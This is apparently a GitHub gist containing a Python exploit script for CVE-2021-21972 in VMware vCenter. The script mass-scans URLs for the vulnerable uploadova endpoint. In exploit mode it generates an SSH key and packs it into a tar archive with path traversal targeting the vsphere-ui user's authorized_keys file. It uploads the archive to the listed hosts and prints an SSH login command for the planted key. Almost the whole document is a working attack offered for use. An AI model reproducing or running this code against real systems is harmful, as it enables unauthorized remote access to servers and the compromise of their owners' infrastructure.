Skip to content

Instantly share code, notes, and snippets.

@milo2012
Last active Feb 26, 2021
Embed
What would you like to do?
CVE-2021-21972.py
import requests, optparse, concurrent.futures, sys, functools, itertools, tarfile, os, shutil
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS
Login using 'ssh -i id_rsa vsphere-ui@x.x.x.x'
'''
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
'''
'''
% python3 /tmp/CVE_2021_21972.py -u https://172.16.164.1 -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
'''
proxies = {
'http' : "http://127.0.0.1:8080",
'https' : "https://127.0.0.1:8080"
}
#proxies = {}
def CVE_2021_21972(url, filename):
tmpUrl=''
if url.endswith("/"):
tmpUrl=url+"ui/vropspluginui/rest/services/uploadova"
else:
tmpUrl=url+"/ui/vropspluginui/rest/services/uploadova"
headers = {"User-Agent": "Mozilla/5.0", "Accept": "application/json"}
files = {'uploadFile': (filename, open(filename, 'rb'),'application/x-tar')}
s=requests.post(tmpUrl, proxies=proxies, headers=headers, files=files, verify=False, timeout=30)
if "SUCCESS" in s.text:
return url,True
else:
return url, False
def checkVuln(url):
try:
tmpUrl=''
if url.endswith("/"):
tmpUrl=url+"ui/vropspluginui/rest/services/uploadova"
else:
tmpUrl=url+"/ui/vropspluginui/rest/services/uploadova"
headers = {"User-Agent": "Mozilla/5.0", "Accept": "application/json"}
s=requests.post(tmpUrl, proxies=proxies, headers=headers, verify=False, timeout=30)
if "Required CommonsMultipartFile parameter 'uploadFile' is not present" in s.text:
return url,True
else:
return url,False
except requests.exceptions.ReadTimeout:
return url,False
def createTar():
if os.path.exists("id_rsa"):
os.remove("id_rsa")
cmd = "ssh-keygen -t rsa -f id_rsa -q -N ''"
os.system(cmd)
shutil.copyfile("id_rsa", "authorized_keys")
tmpPath="../../../../../home/vsphere-ui/.ssh/authorized_keys"
fname="tmp.tar"
print("[*] Creating " + fname + " containing " + tmpPath)
tf = tarfile.open(fname, "a")
tf.add("authorized_keys", tmpPath)
tf.close()
return(fname)
parser = optparse.OptionParser()
parser.add_option('-i',action="store", dest="file", help="file containing list of urls")
parser.add_option('-u', '--url', action="store", dest="url", help="https://1.1.1.1")
parser.add_option('-f', action="store", dest="filename")
parser.add_option('-n', action="store", dest="noOfThreads")
parser.add_option('-e', '--exploit', action="store_true")
parser.add_option('-c', '--check', action="store_true")
options, remainder = parser.parse_args()
if options.exploit:
if options.filename:
filename=options.filename
else:
filename=createTar()
noOfThreads=4
if options.noOfThreads:
noOfThreads=int(options.noOfThreads)
urlList=[]
if options.url:
urlList.append(options.url)
if options.file:
tmpUrlList=[]
with open(options.file) as f:
urlList = f.readlines()
for x in urlList:
x=x.strip()
tmpUrlList.append(x)
urlList=tmpUrlList
if not options.check and not options.exploit:
print("[-] Please choose either the --exploit or --check option")
if options.check:
with concurrent.futures.ThreadPoolExecutor(max_workers=noOfThreads) as executor:
for res in executor.map(checkVuln, urlList):
if res[1]==True:
print("[+] "+res[0]+" is vulnerable to CVE-2021-21972")
if options.exploit:
sucess=False
with concurrent.futures.ThreadPoolExecutor(max_workers=noOfThreads) as executor:
for res in executor.map(CVE_2021_21972, urlList, itertools.repeat(filename)):
if res[1]==True:
print("[+] "+res[0]+" SUCCESS ")
success=True
if success==True:
print("\nLogin using 'ssh -i id_rsa vsphere-ui@x.x.x.x'")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment